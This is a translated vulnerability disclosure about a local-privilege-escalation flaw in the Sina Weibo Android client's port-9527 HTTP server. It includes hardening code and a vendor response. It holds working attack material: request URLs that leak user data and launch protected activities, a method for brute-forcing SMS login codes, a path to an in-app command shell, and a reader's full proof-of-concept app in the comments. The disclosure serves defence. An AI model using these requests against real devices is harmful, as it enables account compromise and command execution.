
Vulnerability summary

Defect ID: wooyun-2015-0111534

Title: Sina Weibo Android client local privilege escalation

Vendor: Sina

Author: 小荷才露尖尖角

Submitted: 2015-05-01 18:53

Fixed: 2015-07-31 08:08

Published: 2015-07-31 08:08

Type: privilege escalation

Severity: medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2015-05-01: details sent to the vendor, awaiting vendor handling
2015-05-02: vendor confirmed; details disclosed to the vendor only
2015-05-05: details opened to third-party security partners
2015-06-26: details opened to core white hats and domain experts
2015-07-06: details opened to regular white hats
2015-07-16: details opened to intern white hats
2015-07-31: details disclosed to the public

Brief description:

A feature of the Sina Weibo Android client leads to local denial of service and privilege escalation.

Details:

Tested version: Sina Weibo Android client v5.2.80
0x01 Overview
The Sina Weibo Android client implements a small HTTP server that listens on TCP port 9527 of the phone's local address. Sending specific HTTP requests to that port returns some sensitive information, starts non-exported Activities (causing denial of service), and even lets a local attacker obtain a GUI shell and execute arbitrary commands with the privileges of the Sina Weibo client's user.
0x02 Vulnerability analysis
In com.sina.weibo.utils.weibohttpd.PushDaemon one can see that Sina Weibo implements a small HTTP server. The server itself is implemented in native code (it loads libweibohttp.so), but HTTP request parsing is handled in the three classes com.sina.weibo.utils.weibohttpd.a/b/c.
com.sina.weibo.utils.weibohttpd.a:
Checks the HTTP request's Referer and splits the string. The Referer must not match any of the following nasty strings:

(image: weisuo.png)


com.sina.weibo.utils.weibohttpd.b:
Implements the login command. When the HTTP request is

http://127.0.0.1:9527/login?callback=xxx


it returns information about the currently logged-in user.
com.sina.weibo.utils.weibohttpd.c:
(1) Implements the query command. When the HTTP request is

http://127.0.0.1:9527/query?appid=packagename


it returns installed-application information for the given packagename; when packagename is com.sina.weibo, more detailed information is returned.
(2) Implements the si command, which sends an Intent. When the HTTP request is

http://127.0.0.1:9527/si?cmp=<packagename>_<componentname>&data=<url scheme>&act=<action name>

it builds the specified Intent and passes it to startActivity.
See the following code fragment:

// Decompiled fragment from com.sina.weibo.utils.weibohttpd.c, reindented, with the
// decompiler's goto labels expressed as a loop. v3 iterates over the request
// parameter names, v10.b maps parameter name to value, v4 is the Intent being
// built and v1 holds the optional JSONP callback name.
while(v3.hasNext()) {
    Object v6 = v3.next();
    if("act".equals(v6)) {
        v4.setAction(v10.b.get(v6));
    }
    if("cmp".equals(v6)) {
        // "cmp=<package>_<component>" becomes an explicit component; whether that
        // component is exported is never checked.
        String[] v9 = v10.b.get(v6).split("_");
        if(v9 != null && v9.length == 2) {
            v4.setComponent(new ComponentName(v9[0], v9[1]));
        }
    }
    if("data".equals(v6)) {
        v4.setData(Uri.parse(v10.b.get(v6)));
    }
    if("callback".equals(v6)) {
        v1 = v10.b.get(v6);
    }
}
if((TextUtils.isEmpty(v4.getAction())) && v4.getComponent() == null && v4.getData() == null) {
    if(TextUtils.isEmpty(((CharSequence)v1))) {
        return "{\"result\":-20000}";
    }
    return this.a(v1, "{\"result\":-20000}");
}
List v0 = this.a.getPackageManager().queryIntentActivities(v4, 0);
if(v0.size() == 0) {
    if(TextUtils.isEmpty(((CharSequence)v1))) {
        return "{\"result\":-10000}";
    }
    return this.a(v1, "{\"result\":-10000}");
}
try {
    // Runs inside the Weibo process, so for com.sina.weibo's own components this
    // is a same-app call and the "exported" protection does not apply.
    this.a.startActivity(v4);
}
catch(Exception v11) {
}
String v5 = v0.size() == 1 ? "{\"result\":200}" : "{\"result\":-40000}";
if(!TextUtils.isEmpty(((CharSequence)v1))) {
    v5 = this.a(v1, v5);
}
return v5;


Because the Intent here is mainly passed to startActivity and therefore requires user interaction, the impact on its own is not large. But when packagename is set to com.sina.weibo itself and componentname to one of com.sina.weibo's activities, any Sina Weibo activity can be started, including protected, non-exported activities, which does have a security impact.
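The following is an added example, not code from the Weibo client or from this report, showing how the si handler above could be hardened along the lines of the first remediation item. The request map is interpreted as before, but the target component is refused when it lies inside the app's own package (because the server runs in the Weibo process, startActivity there is a same-app call and the "exported" attribute gives no protection), and for any other package the component must exist and be exported. The Referer denylist in class a is not relied on, since any local process can send any header. Class and method names (SiHandler, handleSi, wrap), the params map, the -30000 result code and the http/https-only data policy are assumptions of this example; the -20000/-10000/-40000/200 codes are the ones the decompiled fragment returns.

```java
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.net.Uri;
import android.text.TextUtils;

import java.util.List;
import java.util.Map;

/**
 * Hardened "si" request handler (added example; not the Weibo client's code).
 * params holds the decoded query parameters of GET /si (cmp, act, data, callback).
 */
public final class SiHandler {
    private static final String SELF_PACKAGE = "com.sina.weibo";
    private static final int RESULT_FORBIDDEN = -30000;   // constructed code for this example

    private final Context ctx;

    public SiHandler(Context ctx) {
        this.ctx = ctx;
    }

    public String handleSi(Map<String, String> params) {
        String callback = params.get("callback");
        Intent intent = new Intent();

        String act = params.get("act");
        if (!TextUtils.isEmpty(act)) {
            intent.setAction(act);
        }

        String cmp = params.get("cmp");
        if (!TextUtils.isEmpty(cmp)) {
            String[] parts = cmp.split("_");
            if (parts.length != 2) {
                return wrap(callback, -20000);
            }
            ComponentName target = new ComponentName(parts[0], parts[1]);
            // Never start a component of our own package on behalf of an
            // unauthenticated local client: that is exactly the path to the
            // non-exported activities described in the report.
            if (SELF_PACKAGE.equals(target.getPackageName())) {
                return wrap(callback, RESULT_FORBIDDEN);
            }
            // For any other package the component must exist and be exported.
            try {
                ActivityInfo info = ctx.getPackageManager().getActivityInfo(target, 0);
                if (!info.exported) {
                    return wrap(callback, RESULT_FORBIDDEN);
                }
            } catch (PackageManager.NameNotFoundException e) {
                return wrap(callback, -10000);
            }
            intent.setComponent(target);
        }

        String data = params.get("data");
        if (!TextUtils.isEmpty(data)) {
            Uri uri = Uri.parse(data);
            // Policy choice of this example: only web URLs are forwarded as data.
            String scheme = uri.getScheme();
            if (!"http".equalsIgnoreCase(scheme) && !"https".equalsIgnoreCase(scheme)) {
                return wrap(callback, -20000);
            }
            intent.setData(uri);
        }

        // Same "empty request" rule as the original handler.
        if (TextUtils.isEmpty(intent.getAction()) && intent.getComponent() == null
                && intent.getData() == null) {
            return wrap(callback, -20000);
        }

        List<ResolveInfo> matches = ctx.getPackageManager().queryIntentActivities(intent, 0);
        if (matches.isEmpty()) {
            return wrap(callback, -10000);
        }
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);   // needed from a non-Activity Context
        try {
            ctx.startActivity(intent);
        } catch (Exception e) {
            return wrap(callback, -40000);
        }
        return wrap(callback, matches.size() == 1 ? 200 : -40000);
    }

    // JSONP wrapping; assumed to be what this.a(callback, json) does in the original.
    private static String wrap(String callback, int result) {
        String json = "{\"result\":" + result + "}";
        return TextUtils.isEmpty(callback) ? json : callback + "(" + json + ")";
    }
}
```

Even with these checks the endpoint still cannot tell which local process is talking to it, which is why the report's second remediation item (not using a socket for local IPC at all) is the stronger fix.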

Proof of vulnerability:

1. Query the currently logged-in user's information

(image: login_info.png)


2. Query installed-application information (for Sina Weibo)

(image: packageinfo.png)


3. Start non-exported Activities
(1) Local denial of service
Most non-exported activities throw an exception when started, because required parameters are missing, causing a local denial of service.

(image: dos.png)


(2) Open the SMS-login activity (works in version 5.2.0; removed in newer versions)

(image: smscodelogin.png)


After tapping attack, this page appears

(image: sms.png)


This page allows logging in with a phone number and a verification code. Enter a given user's phone number, tap "get verification code", then enter any code and tap confirm; capture the request with Burp and use Intruder to brute-force the 6-digit code. In testing, 1200 attempts were possible before the server banned the client, giving a brute-force success probability of 1200/1000000.
(3) Open engineering mode and obtain a GUI shell
Starting com.sina.weibo.exlibs.NewProjectModeActivityPreLoading brings up Sina Weibo's engineering-mode settings

(image: engmode.png)


(image: eng.png)


Note "Run: api.weibo.cn" in the screenshot; tapping it yields a GUI shell that can execute arbitrary commands with the Sina Weibo user's privileges.

(image: id.png)


Viewing files in the app's private directory

(image: ls.png)


Unfortunately Sina Weibo does not normally run with root privileges; otherwise this would be a good root privilege-escalation vulnerability. That said, some third-party ROMs that bundle Sina Weibo and run it as a high-privilege user cannot be ruled out, which would make the impact greater.

Remediation:

1. Check HTTP requests so that sensitive information cannot be queried, nor non-exported Activities started, through the socket interface.
2. Avoid sockets for local inter-app communication wherever possible, to prevent abuse.
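As an added example of the second remediation item (not the Weibo client's code), the query operation is exposed through a bound Service over Binder instead of a localhost TCP socket. The kernel stamps every Binder transaction with the caller's UID, so the service can verify that the caller is signed with the same certificate before answering; a connection to 127.0.0.1:9527 carries no caller identity at all. The class name LocalQueryService, the TX_QUERY transaction code and the -50000 result code are constructed for this example; the -10000 and 200 codes are the ones the original handlers return.

```java
import android.app.Service;
import android.content.Intent;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.os.Binder;
import android.os.IBinder;
import android.os.Parcel;
import android.os.Process;
import android.os.RemoteException;

/**
 * Added example (not the Weibo client's code): the "query" operation offered over
 * Binder, where the caller's identity is known, instead of over a local socket.
 */
public class LocalQueryService extends Service {
    public static final int TX_QUERY = IBinder.FIRST_CALL_TRANSACTION;   // constructed
    public static final int RESULT_UNTRUSTED = -50000;                    // constructed

    private final Binder binder = new Binder() {
        @Override
        protected boolean onTransact(int code, Parcel data, Parcel reply, int flags)
                throws RemoteException {
            // Binder.getCallingUid() is set by the kernel for the duration of the
            // incoming transaction and cannot be spoofed by the client.
            int callerUid = Binder.getCallingUid();
            if (!isTrustedCaller(callerUid)) {
                reply.writeString("{\"result\":" + RESULT_UNTRUSTED + "}");
                return true;
            }
            if (code == TX_QUERY) {
                reply.writeString(queryPackage(data.readString()));
                return true;
            }
            return super.onTransact(code, data, reply, flags);
        }
    };

    @Override
    public IBinder onBind(Intent intent) {
        return binder;
    }

    // Trust only callers signed with the same certificate as this app.
    private boolean isTrustedCaller(int uid) {
        return getPackageManager().checkSignatures(uid, Process.myUid())
                == PackageManager.SIGNATURE_MATCH;
    }

    // Counterpart of GET /query?appid=<package>, without the extra detail the
    // original returned for com.sina.weibo itself.
    private String queryPackage(String pkg) {
        try {
            PackageInfo info = getPackageManager().getPackageInfo(pkg, 0);
            return "{\"result\":200,\"package\":\"" + info.packageName
                    + "\",\"versionName\":\"" + info.versionName + "\"}";
        } catch (PackageManager.NameNotFoundException e) {
            return "{\"result\":-10000}";
        }
    }
}
```

In the manifest the same property can be enforced by the framework as well: declare a <permission> with android:protectionLevel="signature" and set android:permission to it on the <service> element, so that binding itself is refused for apps signed with a different key, and the in-code check remains as defence in depth.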

Copyright notice: when reposting, credit the source 小荷才露尖尖角@乌云


Vendor response

Vendor reply:

Severity: medium

Vulnerability Rank: 5

Confirmed: 2015-05-02 08:07

Vendor comment:

Thanks for your attention to Sina security; the issue is being fixed.

Latest status:

None yet


Comments

  1. 2015-05-01 18:59 | Nicky ( regular white hat | Rank:477 vulns:69 | http://www.droidsec.cn Android security in Chinese)

    Watching

  2. 2015-05-01 19:13 | ’‘Nome ( intern white hat | Rank:55 vulns:19 | Thanks here to @M4sk @mango @裤裆 @泳少 @5up3r...)

    A timid question for the reporter: has this method been tested on iOS?

  3. 2015-05-01 19:24 | Me_Fortune ( regular white hat | Rank:209 vulns:71 | I'm Me_Fortune)

    Watching

  4. 2015-05-01 20:41 | Chora ( regular white hat | Rank:337 vulns:22 | Survival, living, life.)

    Following the expert.

  5. 2015-05-01 21:52 | 小荷才露尖尖角 ( intern white hat | Rank:91 vulns:13 | less is more)

    @’‘Nome Not tested on iOS yet

  6. 2015-05-02 00:19 | chavez_wang ( passer-by | Rank:0 vulns:1 | Walking the road you came by)

    Watching

  7. 2015-05-05 14:44 | un10ad ( passer-by | Rank:4 vulns:1 | I'm not much of a talker; if anything is off, you ...)

    Come on, let's invite a classmate with a cooler ID to answer .... hmm... 小荷才露尖尖角, your turn

  8. 2015-05-10 11:51 | 明月影 ( passer-by | Rank:12 vulns:8 | Learning techniques, learning approaches.)

    Waiting for disclosure.

  9. 2015-07-06 12:40 | hqdvista ( regular white hat | Rank:154 vulns:31 | N/A)

    Great case

  10. 2015-07-06 16:00 | Nicky ( regular white hat | Rank:477 vulns:69 | http://www.droidsec.cn Android security in Chinese)

    This is a good case

  11. 2015-08-03 20:47 | 阿笑 ( passer-by | Rank:10 vulns:2 | Finally in!!!)

    import android.app.Activity;
    import android.content.Context;
    import android.net.ConnectivityManager;
    import android.net.NetworkInfo;
    import android.os.AsyncTask;
    import android.os.Bundle;
    import android.util.Log;
    import android.view.View;
    import android.widget.AdapterView;
    import android.widget.AdapterView.OnItemSelectedListener;
    import android.widget.ArrayAdapter;
    import android.widget.Button;
    import android.widget.Spinner;
    import android.widget.TextView;

    import java.io.IOException;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    import java.io.Reader;
    import java.io.UnsupportedEncodingException;
    import java.net.HttpURLConnection;
    import java.net.URL;

    public class MainActivity extends Activity {
        // Activity names of the Weibo client offered in the spinner.
        private final String[] m = {
            "com.sina.weibo.InterestProductList", "com.sina.weibo.WBArticalEditActivity", "com.sina.weibo.ShootingPopActivity",
            "com.sina.weibo.photoalbum.VideoAlbumActivity", "com.sina.weibo.photoalbum.camera.CameraActivity", "com.sina.weibo.photoalbum.camera.CameraAdapterActivity",
            "com.sina.weibo.photoalbum.video.VideoCutActivity", "com.sina.weibo.photoalbum.video.edit.VideoEditActivity", "com.sina.weibo.photoalbum.LocalVideoPlayerActivity",
            "com.sina.weibo.photoalbum.LocalVideoPlayerTempActivity", "com.sina.weibo.photoalbum.camera.CameraProxyActivity", "com.tencent.connect.common.AssistActivity",
            "com.sina.weibo.SmsCodeLoginActivity", "com.sina.weibo.SmsCodeLogin", "com.sina.weibo.UpdatePasswordActivity",
            "com.sina.weibo.UserLoginEntranceActivity", "com.sina.weibo.WaterMarkEditActivity", "com.sina.weibo.SettingsPref",
            "com.sina.weibo.SettingsMainActivity", "com.sina.weibo.SettingsLanguageActivity", "com.sina.weibo.page.FollowGroupSelectActivity",
            "com.sina.weibo.SettingsImageActivity", "com.sina.weibo.SettingsAudioActivity", "com.sina.weibo.SilentTimeActivity",
            "com.sina.weibo.RemindFrequencyActivity", "com.sina.weibo.RemindRelationActivity", "com.sina.weibo.weiyou.DMSingleChatActivity",
            "com.sina.weibo.MessageGroupMemberManageActivity", "com.sina.weibo.MessageGroupManageSizeActivity", "com.sina.weibo.weiyou.DMGroupChatActivity",
            "com.sina.weibo.weiyou.DMGroupNoticeActivity", "com.sina.weibo.weiyou.DMChatSettingActivity", "com.sina.weibo.AccountManager",
            "com.sina.weibo.weiyou.DMMessageMsgBoxActivity", "com.sina.weibo.MessageBoxSettingActivity", "com.sina.weibo.FriendCircleMembersAddSearchActivity",
            "com.sina.weibo.GroupMembersAddSearchActivity", "com.sina.weibo.page.MyInfoActivity2", "com.sina.weibo.page.MyInfoTabActivity",
            "com.sina.weibo.page.EditUserInfoActivity", "com.sina.weibo.page.EditUserWorkInfoActivity", "com.sina.weibo.page.EditUserEducationInfoActivity",
            "com.sina.weibo.FillInfoActivity", "com.sina.weibo.page.UserTopicAttentionList", "com.sina.weibo.browser.WeiboBrowser",
            "com.sina.weibo.browser.WeiboBrowserForGuide", "com.sina.weibo.ReadModeActivity", "com.sina.weibo.PrivacyAndSafeActivity",
            "com.sina.weibo.FontSizeSettingActivity", "com.weibo.mobileads.view.FlashAdActivity", "com.sina.weibo.ExceptionDialogActivity",
            "com.sina.weibo.PayConfirmOrderActivity", "com.sina.weibo.DomainRetriveActivity", "com.sina.weibo.MailRetriveActivity",
            "com.sina.weibo.AboutActivity", "com.sina.weibo.ChoiceActivity", "com.sina.weibo.MoreItemsActivity",
            "com.sina.weibo.AEditUserInfo", "com.sina.weibo.page.AEditText", "com.sina.weibo.RegisterHomeActivity",
            "com.sina.weibo.ForgetPwdActivity", "com.sina.weibo.RegisterSquareActivity", "com.sina.weibo.SkinPreviewActivity",
            "com.sina.weibo.MessageContactActivity", "com.sina.weibo.SearchGroupChatAndFansActivity", "com.sina.weibo.SSOLoginActivity",
            "com.sina.weibo.SSOAccountListActivity", "com.sina.weibo.SSOAuthorizeActivity", "com.sina.weibo.ProjectModeActivity",
            "com.sina.weibo.POIListActivity", "com.sina.weibo.ChooseShareScopeActivity", "com.sina.weibo.ChooseContactsInSearchActivity",
            "com.sina.weibo.photoalbum.PicFilterActivity", "com.sina.weibo.photoalbum.ImagePreviewActivity", "com.sina.weibo.photoalbum.PicCropActivity",
            "com.sina.weibo.photoalbum.Pic9cutCropActivity", "com.sina.weibo.Pic9cutGameActivity", "com.sina.weibo.UserGuideContactActivity",
            "com.sina.weibo.UserGuideCategoryDetail", "com.sina.weibo.photoalbum.FilterMarketActivity", "com.sina.weibo.photoalbum.VideoEffectStoreActivity",
            "com.sina.weibo.photoalbum.VideoMusicStoreActivity", "com.sina.weibo.EditSourceActivity", "com.sina.weibo.AttachAppManagementActivity",
            "com.sina.weibo.AttachAppDetailInfoActivity", "com.sina.weibo.FixedCarshActivity", "com.sina.weibo.NoNetActivity",
            "com.sina.weibo.LogFeedbackActivity", "com.sina.weibo.LogFeedbackUnicomActivity", "com.sina.weibo.WebWeiboActivity",
            "com.sina.weibo.DetailLogActivity", "com.sina.weibo.DetailLogItemActivity", "com.sina.weibo.SelectCountryActivity",
            "com.sina.weibo.VerificationCodeActivity", "com.sina.weibo.NewInterestPeopleActivity", "com.sina.weibo.YouMayKnowActivity",
            "com.sina.weibo.NewRegistContact", "com.sina.weibo.FriendCircleFeedGuideActivity", "com.sina.weibo.SpecialFollowFeedGuideActivity",
            "com.sina.weibo.HotCmtAndForwardActivity", "com.sina.weibo.QRCodeGuideActivity", "com.sina.weibo.InfoPageBackGuideActivity",
            "com.weibo.mobileads.view.AdActivity", "com.sina.qrcode.MyQRcodeActivity", "com.sina.popupad.PopupActivity",
            "com.sina.weibo.browser.InfoPageActivity", "com.sina.weibo.RemindSettingsActivity", "com.sina.weibo.RemindInnerSettingsActivity",
            "com.sina.weibo.RemindNoDisturbSettingsActivity", "com.sina.weibo.RemindSettingGuideActivity", "com.sina.weibo.MessageStrangerGuideActivity",
            "com.sina.weibo.page.SquareActivity", "com.sina.weibo.LikeListActivity", "com.sina.weibo.ContactsSearchResultActivity",
            "com.sina.weibo.PrivateSearchFanResultActivity", "com.sina.weibo.page.TopicSuggestionActivity", "com.sina.weibo.page.AtSuggestionActivity",
            "com.sina.weibo.AddFriendActivity", "com.sina.weibo.appmarket.activity.HomePageAppActivity", "com.sina.weibo.appmarket.activity.HomePageWeiGameActivity",
            "com.sina.weibo.appmarket.activity.DownloadMainActivity", "com.sina.weibo.appmarket.activity.WeiboDownloadAppActivity", "com.sina.weibo.appmarket.activity.SubjectActivity",
            "com.sina.weibo.appmarket.activity.SubjectDetailActivity", "com.sina.weibo.appmarket.activity.AppListActivity", "com.sina.weibo.appmarket.activity.AppSearchPageActivity",
            "com.sina.weibo.appmarket.activity.CategoryAppActivity", "com.sina.weibo.appmarket.activity.ReportActivity", "com.sina.weibo.appmarket.activity.AppIgnoredPageActivity",
            "com.sina.weibo.appmarket.activity.AppUpdatePageActivity", "com.sina.weibo.appmarket.activity.AppInstalledPageActivity", "com.sina.weibo.appmarket.activity.MyGamePageActivity",
            "com.sina.weibo.appmarket.activity.BigPicActivity", "com.sina.weibo.appmarket.shell.DialogActivity", "com.alipay.android.app.pay.MiniLaucherActivity",
            "com.alipay.android.app.ui.quickpay.window.MiniPayActivity", "com.alipay.android.app.ui.quickpay.window.MiniWebActivity", "com.alipay.sdk.auth.AuthActivity",
            "com.sina.weibo.terminal.TerminalActivity", "com.sina.weibo.terminal.Term", "com.sina.weibo.terminal.TermPreferences",
            "com.sina.memory.NewProjectModeActivity", "com.sina.weibo.exlibs.NewProjectModeActivityPreLoading", "com.sina.weibo.LogFileReadActivity",
            "com.facebook.LoginActivity", "com.sina.weibo.WeiboGuideActivity", "com.sina.weibo.GroupManageActivity",
            "com.sina.weibo.GroupMembersAddActivity", "com.sina.weibo.media.player.VideoPlayerActivity", "com.sina.weibo.media.player.MusicListActivity",
            "com.sina.weibo.page.MyGroupFollowersActivity", "com.sina.weibo.page.MyFollowersSearchActivity", "com.sina.weibo.page.MyGroupFollowSearchActivity",
            "com.sina.weibo.page.MyFollowSearchResultActivity", "com.sina.weibo.EggBoardActivity", "com.sina.weibo.SharePrivateMessageActivity",
            "com.sina.weibomonitor.view.ExDialog", "com.sina.weibo.NetWorkAnalyseActivity", "com.sina.weibo.VisitorMainTabActivity",
            "com.sina.weibo.VisitorOverseaSignUpActivity", "com.sina.weibo.VisitorGetAccountActivity", "com.sina.weibo.VisitorSignUpActivity",
            "com.sina.weibo.VisitorLoginActivity", "com.sina.weibo.LogFeedbackTrafficActivity", "com.sina.weibo.LogDnsListActivity",
            "com.sina.weibo.VisitorHomeActivity", "com.sina.weibo.VisitorSearchActivity", "com.sina.weibo.VisitorMoreActivity",
            "com.sina.weibo.VisitorMessageActivity", "com.sina.weibo.VisitorMeActivity", "com.sina.weibo.WaterMarkContentEditActivity",
            "com.sina.weibo.wbc.UploadQueueActivity", "com.sina.weibo.wlan.WifiAuthActivity", "com.sina.weibo.ShareModuleActivity",
            "com.sina.weibo.GroupAtSuggestionActivity", "com.sina.weibo.MyJoinGroupsManageActivity", "com.sina.weibo.MyJoinGroupListActivity",
            "com.sina.weibo.hc.DeviceListActivity", "com.sina.weibo.hc.DeviceDetailActivity", "com.sina.weibo.hc.HealthDataActivity",
            "com.sina.weibo.hc.HealthDevelopingActivity", "com.sina.weibo.hc.HealthUserPreviewActivity", "com.sina.weibo.hc.HealthUserSettingActivity",
            "com.sina.weibo.hc.tracking.TrackingActivity", "com.sina.weibo.hc.tracking.MyTrackListActivity"
        };
        private TextView view, viewResult;
        private Spinner spinner;
        private ArrayAdapter<String> adapter;
        private Button bt;
        private String uactivity = null;

        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);
            view = (TextView) findViewById(R.id.textView1);
            spinner = (Spinner) findViewById(R.id.Spinner01);
            bt = (Button) findViewById(R.id.request);
            bt.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View v) {
                    if (uactivity != null) {
                        // String stringUrl = "http://127.0.0.1:9527/si?cmp=com.sina.weibo_" + uactivity;
                        // String stringUrl = "http://127.0.0.1:9527/login?callback=xxx";
                        String stringUrl = "http://127.0.0.1:9527/query?appid=com.sina.weibo";
                        ConnectivityManager connMgr = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE);
                        NetworkInfo networkInfo = connMgr.getActiveNetworkInfo();
                        if (networkInfo != null && networkInfo.isConnected()) {
                            new DownloadWebpageTask().execute(stringUrl);
                        } else {
                            viewResult.setText("No network connection available.");
                        }
                    }
                }
            });
            viewResult = (TextView) findViewById(R.id.result);
            adapter = new ArrayAdapter<String>(this, android.R.layout.simple_spinner_item, m);
            adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item);
            spinner.setAdapter(adapter);
            spinner.setOnItemSelectedListener(new SpinnerSelectedListener());
            spinner.setVisibility(View.VISIBLE);
        }

        class SpinnerSelectedListener implements OnItemSelectedListener {
            public void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long arg3) {
                view.setText("Selected non-exported Activity:\n" + m[arg2]);
                uactivity = m[arg2];
            }

            public void onNothingSelected(AdapterView<?> arg0) {
            }
        }

        public class DownloadWebpageTask extends AsyncTask<String, Void, String> {
            @Override
            protected String doInBackground(String... urls) {
                // params comes from the execute() call: params[0] is the url.
                try {
                    return downloadUrl(urls[0]);
                } catch (IOException e) {
                    return "Unable to retrieve web page. URL may be invalid.";
                }
            }

            @Override
            protected void onPostExecute(String result) {
                viewResult.setText(result);
            }

            // Given a URL, establishes an HttpUrlConnection and retrieves
            // the web page content as an InputStream, which it returns as
            // a string.
            private String downloadUrl(String myurl) throws IOException {
                // Only display the first 500 characters of the retrieved
                // web page content.
                InputStream in = null;
                int len = 500;
                try {
                    URL url = new URL(myurl);
                    Log.d("heen", "url is " + myurl);
                    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
                    conn.setRequestMethod("GET");
                    conn.setRequestProperty("referer", "http://www.sina.com");
                    conn.setDoInput(true);
                    // Starts the query
                    conn.connect();
                    String response = conn.getResponseMessage();
                    Log.d("heen", "The response is: " + response);
                    in = conn.getInputStream();
                    String content = readIt(in, len);
                    return content;
                } catch (IOException ex) {
                    ex.printStackTrace();
                    return null;
                } finally {
                    // Makes sure that the InputStream is closed after the app is
                    // finished using it.
                    if (in != null) {
                        in.close();
                    }
                }
            }

            // Reads an InputStream and converts it to a String.
            public String readIt(InputStream stream, int len) throws IOException, UnsupportedEncodingException {
                Reader reader = new InputStreamReader(stream, "UTF-8");
                char[] buffer = new char[len];
                // read() may return fewer characters than requested; only keep those.
                int n = reader.read(buffer);
                return n < 0 ? "" : new String(buffer, 0, n);
            }
        }
    }

  12. 2015-08-03 20:48 | 阿笑 ( passer-by | Rank:10 vulns:2 | Finally in!!!)

    5wb for you

  13. 2015-08-03 21:30 | 小荷才露尖尖角 ( intern white hat | Rank:91 vulns:13 | less is more)

    @阿笑, thanks